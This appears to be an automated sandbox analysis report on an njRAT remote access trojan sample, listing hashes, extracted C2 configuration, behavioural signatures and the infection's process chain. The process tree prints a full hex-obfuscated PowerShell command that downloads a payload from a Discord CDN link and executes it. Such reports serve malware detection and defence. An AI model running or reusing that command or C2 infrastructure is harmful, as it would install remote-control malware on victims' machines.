Analysis

  • max time kernel: 150s
  • max time network: 151s
  • platform: windows10_x64
  • resource: win10-en
  • submitted: 13-09-2021 17:28

General

  • Target: 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
  • Size: 7KB
  • MD5: 0152ba660d23a2bb6edda5078fc936fa
  • SHA1: 253c14c6dd3e5aaa224b2cb6bfc9a53012896776
  • SHA256: 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522
  • SHA512: 8c2dbe5d3dce477f24d80b2221bc3ebd48bdc923bb599758e116ef4db05f91c392e484e0f46e072809108d11fc7433481f01b3f7d7a0e184114daad8ee5ab666

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated: yes
  • URLs (exe.dropper): https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg

Extracted

  • Family: njrat
  • Version: v2.0
  • Botnet: HacKed
  • C2: d3dx-botnet.portmap.host:7276
  • Mutex: Windows
  • Attributes
    • reg_key: Windows
    • splitter: |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
    "C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4560
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -c "$link = 'https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg';$hex = '28 4E 65 77 2D 4F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 53 74 72 69 6E 67 28 22 24 6C 69 6E 6B 22 29 20 7C 20 49 45 58';$hex.Split(' ') | forEach{[char]([convert]::toint16($_,16))} | forEach{$result=$result+$_};$result | iex"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4744
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            #cmd
            5⤵
            • Drops startup file
            • Suspicious use of AdjustPrivilegeToken
            PID:4972

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery: System Information Discovery (T1082), 1 occurrence

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat
    MD5: 53c8f257e3d32009e9e087dd8ed38da9
    SHA1: ed4f3487930634c56fc02e6d4272eb93a84d7836
    SHA256: 3bb009df04fe062f749515ac36ff348958e8fbfb8897a6d6e0cb34f86e76dd3f
    SHA512: 96c2b00f6c2b876fc0ad47ec68fa414c570c8903924c71d4428fa4878f88d8519a3bcd1c435b480a4959f58ad41802397897dc0ae4cda1a212bf656afe1a9332

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs
    MD5: 232174031b9591e1add2320bf6da9f14
    SHA1: 3f2722464c176abc974441f21fbdeba071d67f5d
    SHA256: 5694b52e005c385d6807e02e45af35cbe39af18bb31325901ac86a633ceb68f7
    SHA512: d675d843204b6aa7077376588dc6ba493a9c300f0f45403daaddb5c4ec8183dec856de966a3fd43e67423674a1240f294b36baec5defb567a474050baa6c51e5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\key.bin
    MD5: 138a4669ce7b2e27012c9f4ffc3993fe
    SHA1: 20f6df71b5d0e20e6ffa7474e3f95cb87b5a8fd0
    SHA256: 83a39301950ddd38becff29f6645556fa25b1eea21148a40ae26ecdafc603206
    SHA512: cae661b658bd171702614162c2da42fa42c72070a806535167a33923b94855f81504ca2e18b6584aba04650a303e29d1eaada86c6e57171a9badd28112a5e09d

  • memory/4560-115-0x0000000000150000-0x0000000000151000-memory.dmp (Filesize: 4KB)
  • memory/4636-117-0x0000000000000000-mapping.dmp
  • memory/4696-120-0x0000000000000000-mapping.dmp
  • memory/4744-137-0x0000025FB0F46000-0x0000025FB0F48000-memory.dmp (Filesize: 8KB)
  • memory/4744-154-0x0000025FB0EC0000-0x0000025FB0ED5000-memory.dmp (Filesize: 84KB)
  • memory/4744-135-0x0000025FB0F40000-0x0000025FB0F42000-memory.dmp (Filesize: 8KB)
  • memory/4744-136-0x0000025FB0F43000-0x0000025FB0F45000-memory.dmp (Filesize: 8KB)
  • memory/4744-126-0x0000025F98DE0000-0x0000025F98DE1000-memory.dmp (Filesize: 4KB)
  • memory/4744-152-0x0000025FB0EB0000-0x0000025FB0EB2000-memory.dmp (Filesize: 8KB)
  • memory/4744-121-0x0000000000000000-mapping.dmp
  • memory/4744-130-0x0000025FB1050000-0x0000025FB1051000-memory.dmp (Filesize: 4KB)
  • memory/4744-158-0x0000025FB0F48000-0x0000025FB0F49000-memory.dmp (Filesize: 4KB)
  • memory/4972-156-0x000000000040838E-mapping.dmp
  • memory/4972-155-0x0000000000400000-0x000000000040E000-memory.dmp (Filesize: 56KB)
  • memory/4972-164-0x0000000008FD0000-0x0000000008FD1000-memory.dmp (Filesize: 4KB)
  • memory/4972-165-0x0000000009B00000-0x0000000009B01000-memory.dmp (Filesize: 4KB)
  • memory/4972-166-0x00000000095F0000-0x00000000095F1000-memory.dmp (Filesize: 4KB)
  • memory/4972-167-0x0000000009600000-0x0000000009601000-memory.dmp (Filesize: 4KB)
  • memory/4972-168-0x00000000095C0000-0x00000000095C1000-memory.dmp (Filesize: 4KB)